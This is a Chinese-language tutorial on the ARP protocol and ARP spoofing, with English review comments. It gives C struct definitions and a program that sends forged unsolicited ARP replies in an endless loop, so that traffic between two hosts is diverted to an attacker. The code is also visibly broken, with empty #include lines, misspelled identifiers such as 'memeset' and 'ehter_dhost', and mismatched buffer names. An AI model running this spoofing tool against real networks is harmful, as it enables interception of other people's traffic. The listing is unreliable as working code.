注意:并不是只有在收到ARP请求时,才会有ARP响应数据包;未经请求的ARP响应也可能出现。
首先介绍ARP协议的报文格式。
结构ether_header定义了以太网帧首部;结构arphdr定义了其后的5个字段,其信息
用于在任何类型的介质上传送ARP请求和回答;ether_arp结构除了包含arphdr结构外,
还包含源主机和目的主机的地址。
定义常量
/* Wire-format constants used by the structures below.
 * EPT_*  : values of the Ethernet header "type" field.
 * ARP_*  : values of the ARP hardware-type and operation fields.
 * All are 16-bit big-endian on the wire, so a sender converts them with
 * htons() before storing them in a frame. */
#define EPT_IP 0x0800 /* type: IP */
#define EPT_ARP 0x0806 /* type: ARP */
#define EPT_RARP 0x8035 /* type: RARP */
#define ARP_HARDWARE 0x0001 /* Dummy type for 802.3 frames (hardware type 1 = Ethernet) */
#define ARP_REQUEST 0x0001 /* ARP request */
#define ARP_REPLY 0x0002 /* ARP reply */
定义以太网首部
/* Ethernet frame header as it appears on the wire: 6-byte destination MAC,
 * 6-byte source MAC and a 2-byte type field (one of the EPT_* values),
 * 14 bytes in total. */
typedef struct ehhdr
{
unsigned char eh_dst[6]; /* destination ethernet address */
unsigned char eh_src[6]; /* source ethernet address */
unsigned short eh_type; /* ethernet packet type, e.g. EPT_ARP */
}EHHDR, *PEHHDR;
定义以太网arp字段
/* ARP header for Ethernet/IPv4, following the Ethernet header on the wire:
 * the five fixed fields (hrd, pro, hln, pln, op) and then the sender and
 * target hardware/protocol address pairs.
 * NOTE(review): arp_spa and arp_tpa are declared unsigned long, which is
 * 8 bytes on LP64 systems, and the compiler may also insert alignment
 * padding before them; sizeof(ARPHDR) is then larger than the 28 bytes of
 * the wire format. The "42 bytes" figure quoted for the full packet below
 * assumes a 32-bit, unpadded layout. Parsing captured frames through this
 * struct on such a system would read the wrong offsets.
 * NOTE(review): the tag name `arphdr` is also used by the system header
 * <net/if_arp.h>; including both in one translation unit would conflict. */
typedef struct arphdr
{
//ARP header
unsigned short arp_hrd; /* format of hardware address (ARP_HARDWARE) */
unsigned short arp_pro; /* format of protocol address (EPT_IP) */
unsigned char arp_hln; /* length of hardware address (6 for Ethernet) */
unsigned char arp_pln; /* length of protocol address (4 for IPv4) */
unsigned short arp_op; /* ARP/RARP operation: ARP_REQUEST or ARP_REPLY */
unsigned char arp_sha[6]; /* sender hardware address */
unsigned long arp_spa; /* sender protocol (IPv4) address */
unsigned char arp_tha[6]; /* target hardware address */
unsigned long arp_tpa; /* target protocol (IPv4) address */
}ARPHDR, *PARPHDR;
定义整个ARP报文包,总长度42字节(14字节以太网首部 + 28字节ARP首部)
/* A complete Ethernet + ARP frame: the Ethernet header immediately followed
 * by the ARP header. Nominally 14 + 28 = 42 bytes (see the size note on
 * ARPHDR). On the wire such a frame is padded up to the 60-byte Ethernet
 * minimum (excluding FCS), which presumably is why the sender below uses a
 * 60-byte buffer. */
typedef struct arpPacket
{
EHHDR ehhdr; /* Ethernet header */
ARPHDR arphdr; /* ARP header and addresses */
} ARPPACKET, *PARPPACKET;
ARP欺骗如下图所示:攻击者向主机B发送ARP响应数据包,其中源IP地址为主机A的IP地址,但MAC地址为攻击者的MAC地址;
同时攻击者向主机A发送ARP响应数据包,其中源IP地址为主机B的IP地址,但MAC地址为攻击者的MAC地址。
这样,当主机A与主机B通信时,双方发送的数据实际上由攻击者接收。
下面的代码组装ARP响应数据包并将其发送出去。
#include
#include
#include
#include
#include
#include
/* Addresses the reply frame is built from. SRC_IP/SRC_MAC are what the
 * frame claims as the sender; TAG_IP/TAG_MAC are the receiver it is
 * addressed to. All four are left empty in this listing. The MAC arrays
 * hold one octet per element (six elements expected, see send_arp_reply). */
#define SRC_IP "" /* dotted-quad IPv4 string, parsed with inet_aton() */
#define TAG_IP "" /* dotted-quad IPv4 string, parsed with inet_aton() */
short SRC_MAC[]={}; /* six MAC octets; copied one by one into ether_shost */
short TAG_MAC[]={}; /* six MAC octets; copied one by one into ether_dhost */
void send_arp_reply(); /* builds one ARP reply frame and sends it on eth0; defined below */
/* Entry point: sends the ARP reply frame built by send_arp_reply() every
 * 30 seconds, forever. The loop never exits, so the final return is
 * unreachable; argc and args are unused. */
int main(int argc,char *args[])
{
while(1)
{
send_arp_reply(); /* one unsolicited reply frame per iteration */
sleep(30); /* fixed re-send interval in seconds */
}
return 0;
}
/* Build a single Ethernet/ARP reply frame from the SRC_IP, SRC_MAC, TAG_IP
 * and TAG_MAC globals and send it raw on "eth0" through a SOCK_PACKET
 * socket, then close the socket.
 * The reply is unsolicited: it answers no request, it simply states that
 * SRC_IP is at SRC_MAC and is addressed to TAG_MAC/TAG_IP. Unsolicited
 * replies of this kind are what ARP-cache monitors and switch-side dynamic
 * ARP inspection are built to notice.
 * Errors: the process exits with -1 if the socket cannot be created; the
 * results of inet_aton() and sendto() are not checked. */
void send_arp_reply()
{
struct ether_header *eth_hdr; /* view of the first 14 bytes of the buffer */
struct ether_arp *arp; /* view of the ARP header that follows it */
char datagramp[60]; /* frame buffer: 60 bytes, the minimum Ethernet frame length without FCS */
eth_hdr = (struct ether_header *)datagram;
memeset(datagram,0,sizeof(datagram)); /* zero the whole frame so trailing pad bytes are 0 */
//set the ethernet header
/* destination MAC = TAG_MAC, source MAC = SRC_MAC, one octet at a time */
eth_hdr->ether_dhost[0]=TAG_MAC[0];
eth_hdr->ehter_dhost[1]=TAG_MAC[1];
eth_hdr->ehter_dhost[2]=TAG_MAC[2];
eth_hdr->ehter_dhost[3]=TAG_MAC[3];
eth_hdr->ehter_dhost[4]=TAG_MAC[4];
eth_hdr->ehter_dhost[5]=TAG_MAC[5];
eth_hdr->ehter_shost[0]=SRC_MAC[0];
eth_hdr->ehter_shost[1]=SRC_MAC[1];
eth_hdr->ehter_shost[2]=SRC_MAC[2];
eth_hdr->ehter_shost[3]=SRC_MAC[3];
eth_hdr->ehter_shost[4]=SRC_MAC[4];
eth_hdr->ehter_shost[5]=SRC_MAC[5];
//set arp head
arp = (struct arp*)(datagram+sizeof(struct ether_header)); /* ARP header starts right after the 14-byte Ethernet header */
arp->arp_hrd=htons(ARPHRD_ETHER);// hardware type: Ethernet
arp->arp_pro=htons(ETHERTYPE_IP);// protocol type: IPv4
arp->arp_hln = 6; // hardware address length (MAC)
arp->arp_pln = 4; // protocol address length (IPv4)
arp->arp_op = htons(2);// opcode 2 = ARP reply (1 would be a request)
//arp body
// sender MAC and IP: the pair the receiver is being told to associate
memcpy((void*)arp->arp_sha,(void*)eth_hdr->ether_shost,6); // sender hardware address, copied from the Ethernet source MAC
struct in_addr inadd_sender;
inet_aton(SRC_IP,&inadd_sender); /* parse SRC_IP into network byte order; return value not checked */
memcpy((void*) arp->arp_spa,(void*)&inadd_sender,4); // sender protocol address (4 raw bytes)
//target MAC and IP
memcpy((void*)arp->arp_tha,(void*)eth_hdr->ether_dhost,6);// target hardware address, copied from the Ethernet destination MAC
struct in_addr inadd_target;
inet_aton(TAG_IP,&inadd_target); /* parse TAG_IP into network byte order; return value not checked */
memcpy((void*) arp->arp_tpa,(void*)&inadd_target,4); //target protocol address (4 raw bytes)
// establish socket
int fd = socket(AF_INET,SOCK_PACKET,htons(ETH_P_ARP)); //SOCK_PACKET: the kernel does not touch the data, it is sent as-is. Already obsolete.
if(fd< 0)
{
perror("socket"); /* report the errno from socket() */
exit(-1); /* no socket, nothing else to do */
}
struct sockaddr sa; /* for SOCK_PACKET the interface name is passed in sa_data; sa_family is left uninitialized here */
strcpy(sa.sa_data,"eth0");
sendto(fd,datagram,sizeof(datagram),0,&sa,sizeof(sa)); /* transmit the whole 60-byte buffer; result not checked */
close(fd);
return;
}